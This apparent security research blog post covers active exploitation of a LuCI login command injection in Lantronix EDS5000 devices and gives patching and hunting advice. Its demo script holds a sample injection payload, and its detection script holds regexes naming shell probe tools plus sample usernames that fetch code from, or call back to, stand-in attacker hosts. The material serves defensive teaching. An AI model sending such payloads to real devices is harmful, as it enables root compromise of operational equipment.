
Lantronix EDS5000 exploitation shows why edge device patch windows are shrinking

Lucas Oliveira, Research
June 26, 2026

CISA has added CVE-2025-67038 to its Known Exploited Vulnerabilities catalog after active exploitation was observed against Lantronix EDS5000 Series serial-to-IP converters. The issue is a critical command injection flaw that can allow unauthenticated attackers to execute operating system commands with root privileges.

The deadline is unusually tight: U.S. federal civilian agencies were told to remediate by June 26, 2026. That urgency makes sense. These devices sit at the edge of operational environments, bridge older serial systems into IP networks, and often remain visible long after their owners assume they are hidden behind the right boundary.

This is not just another "patch your appliance" story. Forescout says exploitation appeared in honeypot telemetry on April 5, 2026, after Lantronix had released patched firmware but before public technical details were available. In other words, attackers may have reverse-engineered the vendor patch and built an exploit before defenders had a clean public narrative to follow.

What CVE-2025-67038 does

CVE-2025-67038 affects Lantronix EDS5000 Series devices, which are serial-to-IP converters commonly used to connect legacy serial equipment to modern networks. The vulnerable path is tied to OpenWRT LuCI, the web interface used to manage device configuration.

The weakness sits in the authentication flow. After a failed login attempt, the HTTP JSON-RPC module writes a log entry by building a command string. The submitted username is concatenated into that string without sanitization, and the string is then handed to a shell and executed as root. Because the shell interprets characters such as quotes, semicolons and $(...) inside the username, an attacker can turn a failed login attempt into root command execution.

The targeted endpoint reported by Forescout is:

/cgi-bin/luci/rpc/auth

That makes this especially dangerous for internet-exposed devices. Attackers do not need valid credentials to reach the vulnerable code path. They need reachability, a crafted request, and a device running affected firmware.
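The pattern is easiest to see side by side. The following is an added illustration written for this page, not Lantronix's or LuCI's code (which is Lua); echo stands in for the device's real logging command, and the payload is constructed. The vulnerable function splices the username into a shell command string, the first fix drops the shell entirely, and the second shows the quoting you need if a shell cannot be avoided.

```python
import shlex
import subprocess


def log_failed_login_vulnerable(username: str) -> str:
    """The pattern the advisory describes: attacker-controlled input is
    spliced into a command string that is then handed to a shell.
    `echo` stands in for the device's real logging command (assumption)."""
    cmd = f"echo 'auth failed for user {username}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def log_failed_login_hardened(username: str) -> str:
    """Fix 1: no shell at all. The username is one argv element, so quotes,
    semicolons and $(...) are plain characters to the logging program."""
    return subprocess.run(
        ["echo", f"auth failed for user {username}"],
        capture_output=True, text=True,
    ).stdout


def log_failed_login_quoted(username: str) -> str:
    """Fix 2: if a shell is unavoidable, quote the whole untrusted token
    (shlex.quote) before it touches the command line."""
    cmd = "echo " + shlex.quote(f"auth failed for user {username}")
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Constructed payload: closes the single-quoted string, runs a second command,
# then reopens a quote so the shell sees balanced syntax. A real probe would
# use sleep/wget/curl instead of echo.
PAYLOAD = "admin'; echo INJECTED; echo '"

if __name__ == "__main__":
    print("vulnerable:", repr(log_failed_login_vulnerable(PAYLOAD)))
    print("hardened:  ", repr(log_failed_login_hardened(PAYLOAD)))
    print("quoted:    ", repr(log_failed_login_quoted(PAYLOAD)))
```

Run it and the vulnerable variant prints INJECTED on its own line, proving the second command executed, while both fixes log the payload as a literal string. The argv form is the one to prefer; quoting is a fallback for code paths that genuinely need shell features.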

Why the timing matters

Lantronix released firmware updates on February 20, 2026. The vulnerability was later published through vulnerability databases, and Forescout detailed the broader BRIDGE:BREAK research in April. But Forescout's honeypot data shows exploitation on April 5, before its public report.

That timeline points to a hard operational reality: patch diffing is enough for capable attackers. When a vendor ships a fix for an edge device, defenders should assume motivated actors may compare firmware versions, identify the changed code path, and develop a working exploit before many asset owners even know the affected device exists in their environment.

This is particularly painful for OT security. Serial-to-IP converters are often treated as infrastructure plumbing. They may support industrial controllers, building systems, medical equipment, energy operations, or remote management workflows. Because they are not always owned by the same team that owns servers and endpoints, they can fall between patch processes.

What exploitation looked like

Forescout tracks the observed activity as Chaya_006, an unattributed cluster targeting Lantronix devices. The activity included reconnaissance against LuCI paths and command injection tests using the username parameter in authentication requests.

The reported exploit attempts used common command execution probes such as sleep commands, wget, curl, nslookup, and shell redirection. That pattern is familiar: first prove code execution, then test outbound connectivity, then determine whether the device can retrieve tooling or signal back to attacker infrastructure.

Forescout also observed more than 4,100 brute-force login attempts against OpenWRT LuCI between January 28 and June 6, alongside a broader exposure estimate of roughly 32,000 internet-facing LuCI devices. Not all of those are Lantronix systems, and some are honeypots, but the number still illustrates the attacker incentive. LuCI is a high-value management surface across many embedded and edge platforms.

Why edge devices keep becoming initial access

Edge devices give attackers three things defenders hate: reachability, privilege, and poor visibility.

A successful exploit against an appliance or embedded management interface may not trigger the same telemetry as a compromised workstation. There may be no EDR agent, no rich process logging, and no central team reviewing authentication anomalies. If the device has network reach into sensitive segments, compromise can become a quiet bridge into more important systems.

The Lantronix case is also a reminder that "small" infrastructure can carry large blast radius. A serial-to-IP converter may look unimportant in an asset inventory, but it can sit next to operational processes that are expensive, fragile, or safety-sensitive. Root access on that device can support persistence, reconnaissance, traffic interception, or pivoting.

Immediate actions

1. Patch Lantronix EDS5000 devices

Upgrade affected EDS5000 devices to the fixed firmware. Lantronix released 2.2.0R1 for the EDS5000 series. Forescout also notes 3.2.0.0R2 for EDS3000 series devices addressed related BRIDGE:BREAK issues.

2. Remove direct internet exposure

Management interfaces for serial-to-IP converters should not be reachable from the public internet. Place access behind a VPN, ZTNA broker, jump host, or tightly scoped management network. If exposure is unavoidable during a transition, monitor it as an emergency exception.

3. Hunt for LuCI exploitation attempts

Review web, firewall, reverse proxy, and packet logs for requests to:

/cgi-bin/luci/rpc/auth

Look for suspicious username values containing shell syntax, command substitution, sleep probes, wget, curl, nslookup, outbound callbacks, or encoded payloads. Note that the username travels in the JSON-RPC request body, not in the URL, so an access log that records only the request line will show the endpoint but not the payload; the injected value is visible in the device's own failed-login logs, in full packet captures, or at a reverse proxy configured to log request bodies. Failed authentication logs may be more important than successful login logs in this case.

4. Rotate weak or default credentials

Forescout observed broad brute-force activity against OpenWRT LuCI. Even after patching CVE-2025-67038, default or weak credentials remain a separate path into device management.

5. Segment operational networks

Serial-to-IP converters should not have broad east-west access. Limit what they can reach, restrict who can manage them, and monitor for unexpected outbound traffic. Network segmentation is not a substitute for patching, but it reduces what an attacker can do after compromise.
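To make steps 3 and 4 concrete, here is an added hunting script written for this page (not Forescout's tooling or the vendor's code). It assumes the LuCI JSON-RPC login shape {"method":"login","params":[user,pass]} and that you have request bodies available, for example from a body-logging reverse proxy or a decoded packet capture. The sample records, addresses and domains are constructed, not real telemetry. It flags injected usernames on the vulnerable endpoint and separately counts login attempts per source so brute-force activity stands out even when the usernames are clean.

```python
import json
import re
from collections import Counter
from dataclasses import dataclass, field

TARGET_PATH = "/cgi-bin/luci/rpc/auth"

# Indicator classes taken from the probes the article lists: shell
# metacharacters and command substitution, the usual execution/egress probes,
# and output redirection used to drop a fetched file.
SHELL_META = re.compile(r"[;|&`]|\$\(|\$\{")
PROBE_WORDS = re.compile(r"\b(sleep|wget|curl|nslookup|busybox|nc|base64)\b", re.IGNORECASE)
REDIRECT = re.compile(r">{1,2}\s*\S|<\s*\S")


@dataclass
class Finding:
    record_no: int
    src_ip: str
    username: str
    reasons: list = field(default_factory=list)


def extract_username(body: str):
    """Username from a LuCI JSON-RPC login call.
    Assumed request shape: {"method": "login", "params": ["user", "pass"]}."""
    try:
        msg = json.loads(body)
    except (ValueError, TypeError):
        return None
    if not isinstance(msg, dict) or msg.get("method") != "login":
        return None
    params = msg.get("params")
    if isinstance(params, list) and params and isinstance(params[0], str):
        return params[0]
    return None


def classify(username: str) -> list:
    """Return the indicator classes a username matches (empty if it looks benign)."""
    reasons = []
    if SHELL_META.search(username):
        reasons.append("shell-metachar")
    if PROBE_WORDS.search(username):
        reasons.append("command-probe")
    if REDIRECT.search(username):
        reasons.append("redirection")
    return reasons


def hunt(records) -> list:
    """records: iterable of (src_ip, method, path, body). Returns findings
    for login calls to the vulnerable endpoint whose username looks injected."""
    findings = []
    for n, (src_ip, method, path, body) in enumerate(records, 1):
        if method != "POST" or path.split("?", 1)[0] != TARGET_PATH:
            continue
        user = extract_username(body)
        if user is None:
            continue
        reasons = classify(user)
        if reasons:
            findings.append(Finding(n, src_ip, user, reasons))
    return findings


def login_attempts(records) -> Counter:
    """Per-source count of login calls, injected or not; a high count from
    one address is the brute-force pattern the article describes."""
    counts = Counter()
    for src_ip, method, path, body in records:
        if method == "POST" and path.split("?", 1)[0] == TARGET_PATH \
                and extract_username(body) is not None:
            counts[src_ip] += 1
    return counts


# Constructed sample: what a body-logging reverse proxy or a packet capture
# decoded to (src_ip, method, path, body) might contain. Addresses are from
# the RFC 5737 documentation ranges; none of this is real telemetry.
SAMPLE_RECORDS = [
    ("198.51.100.7", "POST", TARGET_PATH, '{"id":1,"method":"login","params":["root","admin123"]}'),
    ("192.0.2.44", "POST", TARGET_PATH, '{"id":2,"method":"login","params":["root; sleep 5; #","x"]}'),
    ("192.0.2.44", "POST", TARGET_PATH, '{"id":3,"method":"login","params":["$(wget http://203.0.113.10/x -O- > /tmp/x)","x"]}'),
    ("192.0.2.44", "GET", "/cgi-bin/luci/", ""),
    ("192.0.2.44", "POST", TARGET_PATH, '{"id":4,"method":"login","params":["admin`nslookup a.attacker.example`","x"]}'),
    ("198.51.100.7", "POST", TARGET_PATH, '{"id":5,"method":"login","params":["root","password"]}'),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RECORDS):
        print(f"record {f.record_no} from {f.src_ip}: {f.username!r} -> {', '.join(f.reasons)}")
    print("login attempts per source:", dict(login_attempts(SAMPLE_RECORDS)))
```

On the sample, records 2, 3 and 5 are flagged (the sleep probe, the wget fetch with a redirect into /tmp, and the backtick nslookup callback), while the two plain root logins are not flagged but do show up in the per-source counter. The regexes are deliberately broad: on a management endpoint that should see a handful of logins a day, a false positive costs one analyst minute, whereas a missed injection costs root on the device.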

Strategic takeaway

The defender's clock starts when the patch ships, not when the blog post appears. CVE-2025-67038 shows how quickly attackers can move from firmware changes to working exploitation, especially on edge and OT-adjacent devices with exposed management interfaces.

Organizations should treat device firmware releases as security signals, not just maintenance notes. For internet-facing appliances, routers, gateways, serial converters, and other embedded systems, the safe default is simple: inventory fast, patch fast, restrict management access, and assume public disclosure may not be the first time attackers learn the bug exists.

What is CVE-2025-67038?

CVE-2025-67038 is a critical OS command injection vulnerability affecting Lantronix EDS5000 Series serial-to-IP converters. It can allow unauthenticated attackers to execute commands as root through a LuCI authentication path.

Is CVE-2025-67038 being exploited?

Yes. CISA added it to the Known Exploited Vulnerabilities catalog, and Forescout reported honeypot exploitation activity beginning on April 5, 2026.

What should organizations patch?

Lantronix EDS5000 devices should be upgraded to fixed firmware, including EDS5000 firmware 2.2.0R1. Asset owners should also review related BRIDGE:BREAK advisories for other affected Lantronix and Silex devices.

Why does this matter beyond Lantronix?

The vulnerable surface is tied to OpenWRT LuCI, a management interface used across many embedded devices. The incident highlights broader risk around internet-exposed device management planes, weak credentials, and OT-adjacent edge infrastructure.

References

  1. Analyzing Active Exploitation of Lantronix and OpenWRT LuCI
  2. Known Exploited Vulnerabilities Catalog
  3. CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
  4. Latest Firmware for the EDS5000 series
